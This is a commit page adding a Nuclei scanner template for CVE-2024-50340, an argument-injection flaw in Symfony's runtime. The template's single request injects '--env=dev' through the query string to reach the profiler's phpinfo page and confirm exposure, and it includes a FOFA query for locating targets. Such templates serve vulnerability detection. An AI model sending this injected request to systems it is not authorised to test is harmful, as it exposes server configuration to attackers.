daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create CVE-2024-50340.yaml

patch-14
Dhiyaneshwaran 2024-11-12 11:09:33 +05:30 committed by GitHub
parent 68993bb231
commit 965c0f1680
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 52 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

52
http/cves/2024/CVE-2024-50340.yaml Normal file
View File

@ -0,0 +1,52 @@
id: CVE-2024-50340
info:
name: Remote Access to Symfony Profiler via Injected Arguments
author: DhiyaneshDK
severity: high
description: |
symfony/runtime is a module for the Symphony PHP framework which enables decoupling PHP applications from global state. When the `register_argv_argc` php directive is set to `on` , and users call any URL with a special crafted query string, they are able to change the environment or debug mode used by the kernel when handling the request. As of versions 5.4.46, 6.4.14, and 7.1.7 the `SymfonyRuntime` now ignores the `argv` values for non-SAPI PHP runtimes.
remediation: All users are advised to upgrade. There are no known workarounds for this vulnerability.
reference:
- https://github.com/symfony/symfony/commit/a77b308c3f179ed7c8a8bc295f82b2d6ee3493fa
- https://github.com/symfony/symfony/security/advisories/GHSA-x8vp-gf4q-mw5j
- https://blog.nollium.com/cve-2024-50340-remote-access-to-symfony-profiler-via-injected-arguments-d2f14b4f6ad7
- https://github.com/nollium/CVE-2024-50340-eos-exploit
- https://nvd.nist.gov/vuln/detail/CVE-2024-50340
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
cvss-score: 7.3
cve-id: CVE-2024-50340
cwe-id: CWE-74
epss-score: 0.00043
epss-percentile: 0.10043
metadata:
verified: true
max-request: 1
fofa-query: 'body="<div id=\"symfony\">" || header="Set-Cookie: symfony"'
tags: cve,cve2024,symfony,php
http:
- method: GET
path:
- "{{BaseURL}}/_profiler/phpinfo?+--env=dev"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'